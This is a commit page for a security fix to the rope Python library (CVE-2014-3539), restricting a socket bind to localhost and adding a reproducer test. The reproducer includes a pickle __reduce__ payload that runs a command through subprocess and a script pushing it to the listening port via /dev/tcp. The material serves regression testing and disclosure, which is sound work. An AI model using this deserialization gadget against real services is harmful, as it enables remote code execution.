Commit 7f19bb6d authored by Arnaud Fontaine's avatar Arnaud Fontaine

Mitigations for CVE-2014-3539 from the upstream author personal repository

(https://github.com/mcepl/rope):

  commit a2ea5f98d18ed037090afb048a48f87b515ff8dc
  Author: Matěj Cepl <mcepl@cepl.eu>
  Date:   Tue Feb 10 12:34:20 2015 +0100

      Just add reporter’s suggested reproducer

  commit a6cb534debe9aff623b6b19ae2dedbf872069a50
  Author: Matej Cepl <mcepl@cepl.eu>
  Date:   Thu Feb 12 01:12:15 2015 +0100

      limit socket connections to localhost

Patch-Name: CVE-2014-3539.patch
parent 835afd55
...@@ -116,7 +116,7 @@ class _SocketReceiver(_MessageReceiver): ...@@ -116,7 +116,7 @@ class _SocketReceiver(_MessageReceiver):
self.data_port = 3037 self.data_port = 3037
while self.data_port < 4000: while self.data_port < 4000:
try: try:
self.server_socket.bind(('', self.data_port)) self.server_socket.bind(('127.0.0.1', self.data_port))
break break
except socket.error: except socket.error:
self.data_port += 1 self.data_port += 1
......
#!/usr/bin/env python
# CVE-2014-3539 reproducer/exploit
# Vasyl Kaigorodov <vkaigoro@redhat.com>
# Tested on Python 2.7.x
import sys
from rope.base import project
try:
open('payload.txt', 'r')
except IOError:
print("payload.txt not found, run:")
print("\tpython generate_payload.py")
sys.exit(1)
myproject = project.Project('project/')
res = myproject.get_resource("hello.py")
myproject.pycore.run_module(res)
== List of files ==
project/ - directory containing an example python module
CVE-2014-3539.py - python script which tries to load an example python module
for re-factoring (normal workflow simulation)
generate_payload.py - generates payload.txt (evil code to run)
payload.txt - example payload (running /bin/uptime)
run_reproducer.sh - main file that sticks above together
== Usage ==
Run ./run_reproducer.sh.
If the system is vulnerable, you'll see the output similar to below:
$ ./run_reproducer.sh
SUCCESS: 15:13:46 up 21:26, 2 users, load average: 0.02, 0.63, 1.01
import os.path
import subprocess
try:
import unittest2 as unittest
except ImportError:
import unittest
class TestCVE20143539(unittest.TestCase):
def test_case(self):
cur_dir = os.path.dirname(__file__)
script_name = os.path.join(cur_dir, 'run_reproducer.sh')
pid = subprocess.Popen([script_name], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=cur_dir)
pid.communicate()
self.assertEquals(pid.returncode, 0)
def suite():
result = unittest.TestSuite()
result.addTests(unittest.makeSuite(TestCVE20143539))
return result
if __name__ == '__main__':
import sys
if len(sys.argv) > 1:
unittest.main()
else:
runner = unittest.TextTestRunner()
res = runner.run(suite())
sys.exit(not res.wasSuccessful())
import cPickle
import subprocess
class RunBinSh(object):
def __reduce__(self):
return (subprocess.Popen, (('/bin/uptime',),))
open('payload.txt', 'w').write(cPickle.dumps(RunBinSh()))
csubprocess
Popen
p1
((S'/bin/uptime'
p2
tp3
tp4
Rp5
.
\ No newline at end of file
#!/bin/bash
export PYTHONPATH=$(readlink -f ../..):$PYTHONPATH
trap "killall -- $(basename $0)" EXIT
(while : ; do
( cat payload.txt > /dev/tcp/0.0.0.0/3037; ) &>/dev/null \
&& echo -n "SUCCESS: "
done)&
python CVE-2014-3539.py 2>/dev/null
exit $?
...@@ -16,6 +16,8 @@ import ropetest.simplifytest ...@@ -16,6 +16,8 @@ import ropetest.simplifytest
import ropetest.contrib import ropetest.contrib
import ropetest.refactor import ropetest.refactor
import ropetest.CVE20143539
def suite(): def suite():
result = unittest.TestSuite() result = unittest.TestSuite()
...@@ -33,6 +35,7 @@ def suite(): ...@@ -33,6 +35,7 @@ def suite():
result.addTests(ropetest.refactor.suite()) result.addTests(ropetest.refactor.suite())
result.addTests(ropetest.contrib.suite()) result.addTests(ropetest.contrib.suite())
result.addTests(ropetest.CVE20143539.suite())
return result return result
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment